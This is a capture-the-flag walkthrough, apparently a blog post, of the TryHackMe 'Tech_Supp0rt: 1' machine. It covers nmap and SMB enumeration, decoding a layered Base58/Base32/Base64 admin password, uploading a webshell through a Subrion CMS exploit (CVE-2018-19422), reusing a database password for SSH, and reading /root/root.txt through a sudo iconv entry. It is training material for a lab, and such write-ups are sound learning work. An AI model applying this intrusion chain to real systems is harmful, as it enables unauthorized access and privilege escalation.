Krishna

TryHackMe Tech_Supp0rt: 1 Walkthrough

TryHackMe Page for the Machine => https://tryhackme.com/room/techsupp0rt1

Enum

rustscan nmap

```
rustscan -a 10.10.26.146 -- -A

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ=
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 18468/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42676/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 46039/udp): CLEAN (Timeout)
|   Check 4 (port 2861/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-11-04T17:24:12+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-11-04T11:54:12
|_  start_date: N/A
```

SMB Server Enum

```
└─$ crackmapexec smb techsupport.thm -u '' -p ''
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \:

└─$ crackmapexec smb techsupport.thm -u 'a' -p '' --shares
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \a:
SMB         techsupport.thm 445    TECHSUPPORT      [+] Enumerated shares
SMB         techsupport.thm 445    TECHSUPPORT      Share           Permissions     Remark
SMB         techsupport.thm 445    TECHSUPPORT      -----           -----------     ------
SMB         techsupport.thm 445    TECHSUPPORT      print$                          Printer Drivers
SMB         techsupport.thm 445    TECHSUPPORT      websvr          READ
SMB         techsupport.thm 445    TECHSUPPORT      IPC$                            IPC Service (TechSupport server (Samba, Ubuntu))

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ smbclient //techsupport.thm/websvr
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> PROMPT OFF
smb: \> RECURSE ON
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ ll
total 4
-rw-r--r-- 1 kali kali 273 Nov  4 08:58 enter.txt

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]

Wordpress creds
|->
```

Trying to access the /subrion folder mentioned in enter.txt did not work in the browser, so let's look at the raw response with curl.

```
└─$ curl -v http://techsupport.thm/subrion/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:04:03 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; expires=Fri, 04-Nov-2022 13:34:03 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host techsupport.thm left intact
```

No wonder it's not working: the server answers with a 302 redirect to a strange IP (10.0.2.15, a private address that is not the target), and it also sets an odd-looking cookie.

The enter.txt mentions a panel, which I am guessing is some kind of CMS admin panel.

Let's try and find it. I am modifying my usual ffuf command in two ways: dropping the -r option so redirects are not followed, and filtering out 302 status codes. The server is configured to return a 302 redirect to 10.0.2.15 whenever we request a subfolder of /subrion, which makes fuzzing a pain if we don't handle it properly.

Example

```
└─$ curl -v http://techsupport.thm/subrion/whatintheworld/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/whatintheworld/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:21:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; expires=Fri, 04-Nov-2022 13:51:48 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/whatintheworld/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host techsupport.thm left intact
```

Note: I also removed the -recursion option. There is a trailing / after FUZZ: without it, the server returns a 301 that adds the slash. But for the recursion option to work, the FUZZ keyword needs to be the last thing in the URL string, so the two don't combine here.

Now, let's fuzz!

```
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://techsupport.thm/subrion/FUZZ/ -o ffuf/raftLarge -of html -ic -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf -t 50 -fc 302

install                 [Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms]
updates                 [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms]
panel.php               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.sql               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.bak               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.db                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel                   [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.html              [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.zip               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.txt               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.gz                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]
```

The "cooked" Subrion password from enter.txt decodes in CyberChef with three stacked operations: From_Base58, then From_Base32, then From_Base64.
https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)

Subrion login creds
| user | pass |
| -- | -- |
| admin | CENSORED |
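The same three-stage recipe done offline, as an added example that is not part of the original post: a constructed sample value is "cooked" (Base64, then Base32, then Base58) and decoded in the reverse order, which is exactly what the CyberChef chain above does. The Base58 routines are hand-written here because the standard library has none; the sample secret is made up and is not the password from the box.

```python
import base64

# Bitcoin-style Base58 alphabet (the one selected in the CyberChef recipe).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Read the string as one big base-58 integer; each leading '1' is a leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on characters outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode; only needed here to build the constructed sample."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def _repad(text: str, block: int) -> str:
    """Restore '=' padding that is often stripped from Base32 (block 8) or Base64 (block 4)."""
    return text + "=" * (-len(text) % block)


def decode_chain(text: str) -> bytes:
    """The CyberChef recipe from the post: From_Base58 -> From_Base32 -> From_Base64."""
    stage1 = b58decode(text).decode("ascii")
    stage2 = base64.b32decode(_repad(stage1, 8)).decode("ascii")
    return base64.b64decode(_repad(stage2, 4))  # non-alphabet chars are ignored, like CyberChef


def encode_chain(secret: bytes) -> str:
    """The reverse pipeline (Base64 -> Base32 -> Base58): how such a value gets 'cooked'."""
    stage1 = base64.b64encode(secret).decode("ascii")
    stage2 = base64.b32encode(stage1.encode("ascii")).decode("ascii")
    return b58encode(stage2.encode("ascii"))


if __name__ == "__main__":
    sample = b"S4mple-P4ss!"  # constructed sample, not the real credential
    cooked = encode_chain(sample)
    print(cooked, "->", decode_chain(cooked))
```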

Subrion Admin Portal Enum

After login.

Subrion version 4.2.1 is installed. Searching ExploitDB for this version turns up https://www.exploit-db.com/exploits/49876, an arbitrary file upload exploit (CVE-2018-19422).

Let's try and use it.

Uploading a reverse shell using CVE-2018-19422

Don't forget to add the slash after panel in the URL when running the exploit.

```
└─$ python3 49876.py -u http://techsupport.thm/subrion/panel/ --user=admin --passw=CENSORED
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422

[+] Trying to connect to: http://techsupport.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ipmrjrdahkbtipn

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar

$
```

The above exploit gives us a basic command shell. Let's pivot to a fully featured reverse shell by running a Python3 reverse shell one-liner from it.
Here are some good examples => https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

With this shell, we can get a foothold on the machine.

Foothold

wp-config.php

```php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CENSORED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
```

Let's try an SSH login as the scamsite user (which we found in the home folder) using the database password above.

Success!! We now have a proper login shell.

Let's try for privesc

Privesc

```
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
```

Looks like we have sudo permissions for one command. Let's see if we can leverage that for privesc.

Yes we can => https://gtfobins.github.io/gtfobins/iconv/#sudo

```
scamsite@TechSupport:~$ sudo /usr/bin/iconv 8859_1 -t 8859_1 /root/root.txt
/usr/bin/iconv: cannot open input file `8859_1': No such file or directory
CENSORED
-
```

The error line is because the -f flag before the first 8859_1 was left out, so iconv treats that argument as an input file; it fails to open it, then carries on with /root/root.txt and prints the flag anyway.

DONE!!
